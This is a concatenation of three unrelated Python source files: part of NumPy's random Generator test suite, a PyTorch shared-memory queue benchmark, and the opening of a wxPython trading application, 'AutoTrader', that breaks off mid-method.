[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
# Each config contains the initial seed, a number of raw steps
# the md5 hashes of the initial and the final states' keys and
# the position of of the initial and the final state.
# These were produced using the original C implementation.
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert md5.hexdigest() == config["initial"]["key_md5"]
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert md5.hexdigest() == config["jumped"]["key_md5"]
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [.3, .7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
test_shared.py
|
import sys
import time
import torch
from torch.multiprocessing import Process
from torch.multiprocessing import Queue, SimpleQueue
from torch.multiprocessing import JoinableQueue
#q = SimpleQueue()
#q = Queue()
q = JoinableQueue()
def torch_shared_mem_process(shared_memory):
counter = 0
start = time.time()
while True:
data = q.get()
counter += 1
if data is None:
print(f'[torch_shared_mem_process_q1] Received with shared memory {shared_memory}: {time.time() - start}')
return
# assert data.is_shared()
del data
def test_mem_share(share_memory):
p = Process(target=torch_shared_mem_process, args=(share_memory, ))
p.start()
start = time.time()
n = 100
for i in range(n):
data = torch.zeros([5, 1280, 720, 3], dtype=torch.float, pin_memory=True)
if share_memory:
data.share_memory_()
q.put(data)
else:
q.put(data.numpy())
q.put(None)
p.join()
return time.time() - start
def test_share_mem():
print()
with_shared_memory = test_mem_share(share_memory=True)
no_shared_memory = test_mem_share(share_memory=False)
print(f'Took {no_shared_memory:.1f} s without shared memory.')
print(f'Took {with_shared_memory:.1f} s with shared memory.')
with_shared_memory = test_mem_share(share_memory=True)
no_shared_memory = test_mem_share(share_memory=False)
print(f'Took {no_shared_memory:.1f} s without shared memory.')
print(f'Took {with_shared_memory:.1f} s with shared memory.')
with_shared_memory = test_mem_share(share_memory=True)
no_shared_memory = test_mem_share(share_memory=False)
print(f'Took {no_shared_memory:.1f} s without shared memory.')
print(f'Took {with_shared_memory:.1f} s with shared memory.')
def test_share_memory():
print()
for i in range(100):
t = torch.empty(5, 3, 720, 1280)
t.share_memory_()
q.put(t)
|
autotrader.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: terryh.tp at gmail.com
# wxPython
import wx
from wx.lib.wordwrap import wordwrap
from wxobject import MyFrame, M, C, D, S
import os
import sys
import logging
import re
import datetime
import subprocess
import shlex
import tempfile
import multiprocessing
import multiprocessing.forking
# help pyinstaller, cx_Freeze to include
from ctypes import POINTER, WINFUNCTYPE, c_char_p, c_void_p, c_int, c_ulong
from ctypes.wintypes import BOOL, DWORD, BYTE, INT, LPCWSTR, UINT, ULONG
#import calendar
#from shutil import copyfile
# locale
#import gettext
#_ = gettext.ugettext
# third party module
from configobj import ConfigObj
#help pyinstaller to find
import pytz
#------------------------------------------
from tz import timezones
from wxutils import wxd_to_python, python_to_wxd, showMsg, ShowBusyCursor
from quote.utils import get_now, get_tz_hhmm
# Process
from quote.quoteworker import QuoteWriter
__version__ = u'0.2.1'
__appname__ = u'AutoTrader'
__author__ = u'TerryH'
app_realpath = os.path.realpath(sys.argv[0])
app_dir = os.path.dirname(app_realpath)
market_ini = os.path.join(app_dir, 'config', 'market.ini')
commodity_ini = os.path.join(app_dir, 'config', 'commodity.ini')
strategy_ini = os.path.join(app_dir, 'config', 'strategy.ini')
data_dir = os.path.join(app_dir, 'data')
if not os.path.exists(data_dir):
os.makedirs(data_dir)
re_alphanumeric = re.compile(r'^\w+$')
re_date = re.compile(r'^\d{4}-\d{2}-\d{2}$')
quote_module_dir = 'quote'
QUOTE_SOURCE = [u"", u'DDE']
# fixed name for quoteworker
QUOTE_WRITER_EXE = 'quoteworker.exe'
TRADER_EXE = 'trader.exe'
# support tracking trade time
SUPPORT_TIME = ['min1', 'min2', 'min3', 'min5', 'min15', 'min30', 'hour1',
'day1']
SUPPORT_TIME_NAME = ['1 Min', '2 Min', '3 Min', '5 Min', '15 Min',
'30 Min', '1 Hour', '1 Day']
#SUPPORT_TIME_NAME = ['1 Min':'min1',
# '2 Min':'min2',
# '3 Min':'min3',
# '5 Min':'min5',
# '15 Min':'min15',
# '30 Min':'min30',
# '1 Hour':'hour1',
# '1 Day':'day1'
# }
######################################################
# work around for pyinstaller one file execuable pack
# but now we use cx_Freeze
class _Popen(multiprocessing.forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
# Last character is stripped in C-loader. We have to add
# '/' or '\\' at the end.
os.putenv('_MEIPASS2', sys._MEIPASS + os.sep)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
class Process(multiprocessing.Process):
_Popen = _Popen
################################################################################
# start multiprocessing.Process outside wxApp main loop
# now in favor to subprocess.Popen via the following code block
def start_quote_process(quote_method, commodity='', commodity_ini=''):
quote_module = __import__(
"quote.%s" % quote_method, fromlist=[quote_method])
p = multiprocessing.Process(
target=quote_module.main, args=(commodity, commodity_ini))
p.start()
return p
def start_quote_workers(market_ini, commodity_ini, ccode):
p = QuoteWriter(market_ini, commodity_ini, ccode)
p.start()
return p
################################################################################
################################################################################
# start subprocess.Popen outside wxApp main loop
def sub_process_stdout(final_command):
#print final_command
p = subprocess.Popen(shlex.split(final_command), stdout=subprocess.PIPE)
return p
def sub_process(final_command):
#print final_command
p = subprocess.Popen(shlex.split(final_command))
return p
################################################################################
#------------------------------------------
class Mixin(object):
def collect_data(self):
raw_dict = {}
for k in self.field_keys:
if getattr(self.__dict__[k], 'GetValue', False):
raw_dict[k] = self.__dict__[k].GetValue()
elif getattr(self.__dict__[k], 'GetStringSelection', False):
raw_dict[k] = self.__dict__[k].GetStringSelection()
elif getattr(self.__dict__[k], 'GetPath', False):
raw_dict[k] = self.__dict__[k].GetPath()
return raw_dict
def loaditem(self, code=''):
if self.configobj and code in self.configobj:
for k in self.field_keys:
#print k
if self.configobj[code].get(k):
setvalue = self.configobj[code].get(k)
# casting
if setvalue == u'True':
setvalue = True
if setvalue == u'False':
setvalue = False
# datetime date to wx.DateTime
if (isinstance(setvalue, str) or isinstance(setvalue, unicode)) and re_date.search(setvalue):
setvalue = python_to_wxd(setvalue)
if getattr(self.__dict__[k], 'SetValue', False):
self.__dict__[k].SetValue(setvalue)
